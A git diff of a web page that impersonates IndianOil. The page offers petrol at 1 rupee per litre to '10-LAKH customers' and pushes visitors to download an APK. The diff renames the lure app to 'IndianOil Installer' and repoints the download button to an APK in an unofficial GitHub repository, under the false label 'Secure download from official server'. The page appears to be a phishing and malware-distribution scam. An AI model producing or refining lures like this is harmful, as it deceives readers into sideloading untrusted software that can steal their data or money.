--- a/index.html
+++ b/index.html
@@ -270,11 +270,11 @@
             <li>Get 1-litre petrol at @ just 1RS.</li>
             <li>Show barcode at any IndianOil Petrol pump</li>
             <li>Limited to only 10-LAKH customers.</li>
-            <li>Download XtraRewards app from below and register to get barcode.</li>
+            <li>Download IndianOil Installer app from below and register to get barcode.</li>
         </ul>
 
         <!-- Download Button Above the Image -->
-        <a href="https://github.com/indian-oil/1Litre-petrol/raw/refs/heads/main/IndianOil.apk" class="download-btn" target="_blank">📲 Download IndianOil App</a>
+        <a href="https://github.com/indian-oil/1Litre-petrol/raw/refs/heads/main/IndianOil%20Installer.apk" class="download-btn" target="_blank">📲 Download IndianOil App</a>
         <p style="margin-top: 6px; font-size: 13px; color: rgb(82, 82, 82);">Secure download from official server</p>
 
         <img src="https://iocl.com/admin/img/UploadedFiles/MenuHeading/Files/English/959a312d3edf41388dc2074cbc6471a9.jpg" alt="PM Narendra Modi" class="hero-image">
